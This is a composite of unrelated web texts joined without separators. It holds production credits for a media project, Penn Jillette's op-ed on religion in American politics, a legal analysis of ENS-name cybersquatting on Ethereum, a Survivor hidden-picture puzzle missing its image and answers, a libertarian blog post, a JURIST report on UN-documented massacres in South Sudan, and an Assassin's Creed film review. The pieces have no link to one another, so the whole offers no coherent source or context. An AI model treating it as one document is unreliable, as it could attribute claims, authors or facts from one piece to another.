Associate Producer: Rachel Dennis is a core contributor to The Newest Americans.
Music & Audio Design: Guillermo E. Brown is an artist and immigrant son whose practice is based around music, making new sounds, singing and drumming.
Students: Dayana Cabrera, Destinee Holmes, Jonathon Marecos, Jennifer Melchor, Imani (Destiny) Thomas
Visuals:
Ruddy Roye is a Brooklyn based documentary photographer specializing in editorial and environmental portraits and photo-journalism. Ruddy is inspired by the raw and gritty lives of grass-roots people, especially those of his homeland of Jamaica.
Because I wrote a book with "Atheist" in the subtitle and I go on political TV shows to hawk that book, well-groomed meat puppets ask me why politicians like Michele Bachmann and Rick Perry are saying bugnutty Christian stuff.
I have an idea why these politicians have gone all religious. I think the problem comes down to the word "Christian" and what it has come to mean.
People didn't start self-labeling or getting labeled Christian until the last part of the 20th century. Before that, you might identify as a Baptist or a Southern Baptist or a Methodist. But there wasn't one identifier that put you in a fold with all the other believers.
There was no "Christian nation" for the simple reason that the Christians were afraid of one another. America was founded on Christians not trusting each other.
Robert Ingersoll, "The Great Agnostic" of the 19th century, was courted by many politicians. Candidates wanted Ingersoll on board to show they were open to free thought. After all, if they were open to Ingersoll, a nonbeliever, surely they'd tolerate the other Christian groups too.
I'm no Ingersoll, but I'm an atheist who, like him, speaks publicly about not believing, and I can assure you today's politicians don't court me.
When I was a kid, politicians wanted to avoid talking about religion if they could. John F. Kennedy couldn't duck the issue, being Catholic and all. So he reminded Americans that religion shouldn't be an issue, that he was concentrating on big things like poverty and hunger and leading the space race. When he finally got around to talking about religion, he said: "I believe in an America where the separation of church and state is absolute." Can you imagine a presidential candidate talking that way today?
Jimmy Carter happily identified as born-again, and that phrase and the magic word Christian started to be used more and more. One American president who mentioned religion constantly was Bill Clinton. He did not care what church he appeared in as long as he was seen at a church.
And, now, we come to Bachmann and Perry.
I've used pornographic images, obscenity and poetry to try to make even the most doubtful blush, but I've never come close to Bachmann's insult to the honest faithful when she said the suffering and casualties of natural disasters were her God's message to wayward politicians. What she said was disgusting and not generally Christian at all. But her blasphemous message was delivered on the news as just that.
Bachmann was a longtime member of the Salem Lutheran Church, a small denomination that has some odd teachings. But even in the broadest definition of Lutherans, there are only about 13.5 million. Now Bachmann has moved to Eagle Brook, an evangelical church. Even if she wins all the evangelical vote, that gives her only 26.3 percent of the American people. With those percentages, you need to shut up about religion.
Perry has moved away from his Methodist background (which claims about 8 million American members) and moved to the Lake Hills Baptist Church, which went on to drop the word Baptist to be more inclusive. When Perry did his big apolitical political rally in August, he was careful to call it nondenominational. It was Christian. Now let's watch Mitt Romney, a Mormon, as he works on trying to convince Americans that his sect, with its belief that the Garden of Eden was in North America, is just another Christian offshoot.
Atheists are growing fast, from under 2 percent to about 8 percent just in this century. If you throw in self-labeled agnostics and those who identify as not religious, you're getting up to around 20 percent. Evangelicals are about 26 percent, Catholics about 23 percent, Jews, 1.7 percent, Mormons also 1.7 percent.
Let's just hope our politicians keep expanding the group of people they want to serve. Rather than embracing Christian as the magic word of politics, we can move on to the truly magical word: American. And maybe we can even go a step further and make the magic word "humanity."
Jillette, half of the magic comedy team of Penn & Teller, is the author of "God, No!" He wrote this for the Los Angeles Times.
After receiving several questions from the Ethereum community regarding this topic, Bern Weiss LLP spent the last week producing an in-depth analysis of ENS-name cybersquatting and the legal and pragmatic considerations surrounding the practice. This three-part series contemplates this scenario. Part One is an introduction for newcomers to the nature of cyber-squatting and why the ENS system presents new challenges in curbing the phenomenon. Part Two explains how laws developed for the legacy DNS system will likely to apply to squatters in the decentralized web. And Part Three considers the difficulties in enforcing courts' decisions over these matters given the decentralized nature of Ethereum, and elaborates on different perspectives and solutions offered by key players in the ENS community on how the situation may unfold over the next few years.
On May 25, 2017, the “reveal bid” stage for the auction for ownership[1] of “Samsung.eth” concluded on the ENS registrar contract. The highest bid for this name was 1,300 Ether, with a second highest bid of 277 Ether, which means (according to the ENS bidding rules) that the name was locked in for around $72,000 at Ether's current price ($260 ETH/USD). 83 unique wallet addresses bid for this name, likely indicating there were at least 82 attempts to “cyber-squat” – registering famous or trademarked domain names by individuals not legally entitled to such use of the name. Given the number of high-value bids the winning wallet placed on other famous ENS contracts, it is likely that a cyber-squatter (“ENS-squatter” or “squatter”), not Samsung, was the successful bidder.
There are nearly 2,500 reported instances per year of domain name squatting on the internet, a long-standing problem affecting companies and entities of all sizes and prestige. The victims of traditional cyber-squatting are generally compelled to engage in costly litigation to protect their brands. Foreseeing this issue on the new decentralized web, ENS developers have maneuvered to disincentivize squatting by making the practice as uneconomical as possible. Nonetheless, there is still a strong likelihood that the practice is already, and will continue to be, widespread in the ENS system.
Some have wondered if more should be done to better combat ENS-squatting. While courts would likely look unfavorably upon this practice, many in the blockchain ecosystem question whether and how courts will be able to enforce their decisions in decentralized networks given the lack of a central authority to implement a court order. This piece summarizes the forces that may cause ENS-squatting, how courts will likely address the practice, and some ideas for discouraging this activity on the decentralized web.
1. What Are ENS Names and Why Would Someone “Squat” on One?
The Ethereum Name Service (“ENS”) system is a novel attempt to assign human-readable web addresses to help regular web-users easily access websites built on decentralized infrastructure (the “decentralized web”) the same way that Domain Name Service (“DNS”) organizations did so for the legacy internet system. Early internet developers created the DNS to assign human readable “domain names” – the plain-text identifier that ends with “.com,” “.net,” or another similar suffix used to navigate to a website (e.g., “www.samsung.com”) – so that users could access websites by entering domain names, rather than more complicated (and generally forgettable) numerical IP addresses. DNS names are assigned by the Internet Corporation of Assigned Names and Numbers (“ICANN”), which has quasi-legal authority over how domain names are distributed and which maintains exclusive control over all domain names so that each name will only redirect to a single website.
The decentralized web is an attempt to move away from the IP address-based web, instead allowing web-hosting across many machines in a way that is redundant, secure, and free from location-based identifiers. Decentralized web advocates believe that its ability to obfuscate online activity's physical location and return control of users' information back to the users themselves solves several fundamental problems caused by the manner in which the legacy centralized internet has developed, including how (a) certain parties (like governmental or corporate entities) can block or censor websites or specific content, (b) entities can accumulate and sell massive amounts of individuals' internet activity and other information, and (c) attackers can exploit security vulnerabilities based on a website's centralized nature (such as so-called DDoS attacks).
ENS is a system that assigns human-readable addresses to the more complicated (and forgettable) hexadecimal Ethereum wallet addresses that are stored on the blockchain. ENS addresses can be used to redirect browsers to web content hosted through decentralized protocols such as the InterPlanetary File System (IPFS) and Swarm in the same way the DNS system does so for the legacy internet. However, ENS's central registration authority is an executable distributed code contract (“EDCC”), which is immutable (the underlying code cannot generally be altered by any human authority) – in other words, the ICANN/DNS system is replaced by a completely automated system that assigns domain names in the decentralized web. Once an individual obtains an ENS name, the name cannot be transferred to another user without that individual's consent.
Some ENS-squatters who believe that the decentralized web will disrupt the global economy in the same way the internet did in the 1990s are purchasing ENS names containing famous protected marks now while they are still relatively inexpensive. Other ENS-squatters might look to profit by utilizing the fame or brand identity of a famous protected mark to siphon traffic to their own products and services, or might even be competitors of the protected mark's holder looking to unfairly tarnish the brand of their competition. In any of these circumstances – and unlike in the legacy DNS system where ICANN can remove a squatter's rights to a specific domain name if it determines that the squatter is unfairly trying to exploit its ownership of the name – there is no central authority that can override a squatter's efforts in ENS. If the decentralized web ultimately overtakes the legacy internet, as many believe it will, this immutable feature may potentially make ENS-squatting a more lucrative practice than squatting on DNS-registered names because there is no risk of a central authority forcibly transferring control of an ENS address.
[1] The mechanism for ENS name auctions is complicated, but can be summarized as follows: first, a specific ENS name (such as Samsung.eth) is released for bidding by the automated ENS Register executable distributed code contract (“EDCC”); next, a user can access that EDCC using an Ethereum wallet address to initiate the auction's bidding period, which lasts three days; other users may bid during the period, but most (if not all) bids are kept secret until the bidding period concludes; the auction then enters the “reveal period,” a two day period during which users who bid on the name use their Ethereum wallet to again interact with the ENS Register EDCC to display their bids; if a user who reveals their bid is not the currently revealed highest bidder, then their Ether is returned to them less 0.5% of their bid, which is “burned” forever; if they are the highest bidder, their bid remains locked in the transaction until and unless another user reveals a higher bid; at the conclusion of the reveal period, the highest bidder is returned the amount of their bid that is in excess of the second highest bid's value, and they are awarded ownership of that ENS name; the remainder of the new owner's bid is then “locked” for at least one year, after which they will have the option to maintain their ownership of that address or release the locked funds back to their account. The entire process is automated, and there is no opportunity for human intervention in the process other than that outlined here.
No kid likes going to the doctor's office. It's boring, it's stuffy, and odds are you're going to end up getting some kind of gross medication (or worse, a shot!) The only good thing about those check-ups was getting to read “Highlights” Magazine in the waiting room.
Now, I'm sure kids these days have their iPwns and their Nintendo Wii U Xboxes to entertain them. But back in my day, we had to keep ourselves busy with those cool Hidden Picures puzzles.
So, in honor of “Survivor” busting out a special two-hour episode this Wednesday, I've decided to try my own twist on those Hidden Pictures puzzles…
HOW TO PLAY: Elements from all 31 “Survivor” logos are incorporated in the logo below. Give yourself a point for each season you correctly locate. Then post your score in the comments below. (Be honest.)
SCORE:
1-10: Your Game Is Flawed
11-20: Who Wants to Date Somebody Who Doesn't Make the Merge?
21-28: Basically, You're a Bad Ass.
29-32: Probst Calls You by Your Last Name
Answer Key…
Advertisements
Tags: jeff probst, survivor
In 2008 Nick Gillespie and Matt Welch hailed a “libertarian moment,” encompassing everything from the Internet to the collapse of “legacy” industries and legacy entitlement programs. I've used the same term here, when NPR talked about Ron Paul and when polls showed rising support for smaller government, gay marriage, and drug legalization.
But suddenly, today, everyone seems to see a libertarian moment. Driving in to work, I got so tired of the smug self-satisfaction on public radio's pledge drive, I switched to the vigorously right-wing Chris Plante Show just in time to hear Plante say, “This is a great day for libertarianism” in regard to the abuse-of-power stories dominating the mainstream media.
And then, mirabile dictu, I got to the office, opened the Washington Post, and found today's column by Michael Gerson. Now, as he says in today's column, Gerson is “conspicuously not a libertarian.” Indeed, he is the most vociferously anti-libertarian columnist in contemporary punditry. And yet his column today is titled (in the print paper):
Making libertarians of us all
Man, you've got to abuse power something awful to make Michael Gerson start thinking libertarian. So thanks, IRS and Justice Department!
And now that the Obama administration's abuse of power has got our attention, can we broaden our focus to take in health care mandates, recess appointments, campus speech regulations, the anti-constitutional Independent Payment Advisory Board, similar extra-legislative bodies in Dodd-Frank, the expropriation of Chrysler creditors, and illegal wars?
[JURIST] The UN Mission in South Sudan (UNMISS) [official website] reported [text, PDF] Friday that hundreds of civilians were targeted and massacred based on their ethnicity and political beliefs in two separate events last year that may amount to war crimes. In the capitals of Unity State and Jongelei, 353 civilians were murdered and another 250 wounded in attacks last April. These numbers were acquired through physical evidence and interviews of 142 sources. The UN believes that the crimes may amount to war crimes, as a hospital, mosque and UN base were targeted in the attacks. A UNMISS spokesperson stated [press release, PDF], “[t]his risks an even greater polarization of the country along ethnic lines with potentially serious repercussions for the state of human rights and the prospects for reconciliation.” The UN will continue to undertake further investigations in an effort to work with the South Sudanese government and bring the perpetrators to justice.
South Sudan [JURIST backgrounder], the world's youngest nation, has been embroiled in a civil war since December 2013 after President Salva Kiir [BBC profile] accused his ex-vice-president, Riek Machar, of plotting to overthrow him. In August in a briefing before the UN Security Council, Assistant Secretary-General for UN Peacekeeping Operations Edmond Mulet [UN News Centre report] discussed the ongoing humanitarian crisis in South Sudan, describing it as a “man-made crisis” [JURIST report], putting South Sudan on the “brink of a humanitarian catastrophe and a protracted internal conflict.” In May UNMISS released a report indicating that both sides in the South Sudan conflict are committing gross human rights violations [JURIST report].
This film adaptation of the successful videogame, in which Fassbender must battle Templars after the original apple from Eden, is an interminable, lifeless mess
“What the fuck is going on?” mutters Michael Fassbender's character through clenched teeth, reasonably early on in the course of this interminable film, based on the lucrative video game series Assassin's Creed. You can imagine each of its stars – Fassbender, Marion Cotillard, Jeremy Irons, Essie Davis – saying much the same thing while looking through the script, before being directed to the fee on the last page of their contract. It's an action movie, with dollops of thriller and splodges of Dan Brown conspiracy; and hardly five minutes go by without someone in a monk's outfit doing a bit of sub-parkour jumping from the roof of one building to another. And yet it is at all times mysteriously, transcendentally boring.
I bet playing the game is much more exciting. But then getting Fassbender to slap a coat of Dulux on the wall of his hi-tech prison cell and monitoring the progressive moisture-loss would be more exciting.
The idea is that Fassbender plays Cal Lynch, a criminal tearaway who is about to be executed for murder by lethal injection. But he is spirited away by a creepy corporation called Abstergo Industries with links to the government, and forced to be a human lab rat. And why? Well it's obvious. This organisation has discovered that Cal is the descendant of one Aguilar de Nerha, member of a secret brotherhood of warrior assassins in 15th-century Spain, dedicated to battling the tyrannical Templar Order, and rescuing and protecting the original Apple of Eden, which contains the seeds of man's first disobedience and is therefore the crucible of man's free will.
The Abstergo organisation's leaders – glassy-eyed Sofia (Marion Cotillard) and her cadaverous, creepy, polo-neck-wearing dad Rikkin (Jeremy Irons) – want to use a VR machine to get Cal to regress to his 15th-century street-fighting, building-jumping self, ostensibly to research into violence. But could it be that they themselves are secret Templars who want to use him to track down that all-important but strangely dull Apple of Eden?
Michael Fassbender: ‘I was a bit of a worrywart. I've tried to work on that' Read more
Theological pedants might grumble that the point about the Apple is that it no longer exists because it was eaten. At the very most, it can only exist in a half-munched form, surely? But this is very far from being the point. Cal is going to be plugged into this machine, with its occult “animus” component, to transfer his soul back in time for some brawling and stabbing and cowl-wearing. Marion Cotillard says in her doom-laden accent: “Prepare the animus”; and it sounds worryingly like “Prepare the enemas”.
There is no animus in this film, however. It's rare to see a film quite so lacking in animus. It exists only to gouge money out of gamers. They might well want to stick to the game.
